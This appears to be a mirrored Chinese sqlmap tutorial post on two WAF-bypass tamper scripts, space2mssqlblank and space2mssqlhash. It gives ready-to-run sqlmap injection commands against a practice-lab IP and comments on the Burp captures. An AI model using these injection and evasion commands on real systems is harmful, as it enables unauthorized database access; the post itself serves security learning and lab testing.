zoukankan      html  css  js  c++  java
  • sqlmap从入门到精通-第七章-7-20 绕过WAF脚本-space2mssqlblank.py&space2mssqlhash.py

    42. space2mssqlblank.py脚本

    使用blanks备选字符集中的随机空白符替换空格符,适用于SQL Server 2005 这个局限性比较大

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mssqlblank.py" --proxy="http://127.0.0.1:8080" -batch

    因为只适用于sql server 2005 所以这次测试目标是不能注入成功,但是我们还得看下burp抓包情况,看看绕过的特征是什么

    发现也看不出来效果

    =================================================================================================================================================

    43. space2mssqlhash.py脚本

    使用# (%23)加个换行符(%0A)去替换payload中的空格,适用于数据库mssql,mysql

    测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2mssqlhash.py" --proxy="http://127.0.0.1:8080" -batch

    发现是可以注入成功,看看burp抓包情况

     效果还是很明显的,替换了空格和加了换行符

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    入门指引之永久素材
    入门指引之上传临时素材
    入门指引之查看accesstoken
    java中的左移 右移
    病狗问题
    leetcode 几何题 位运算 面试编程
    CNN网络参数
    python学习整理
    JAVA问题整理
    计算机网络整理
  • 原文地址:https://www.cnblogs.com/autopwn/p/13606683.html
Copyright © 2011-2022 走看看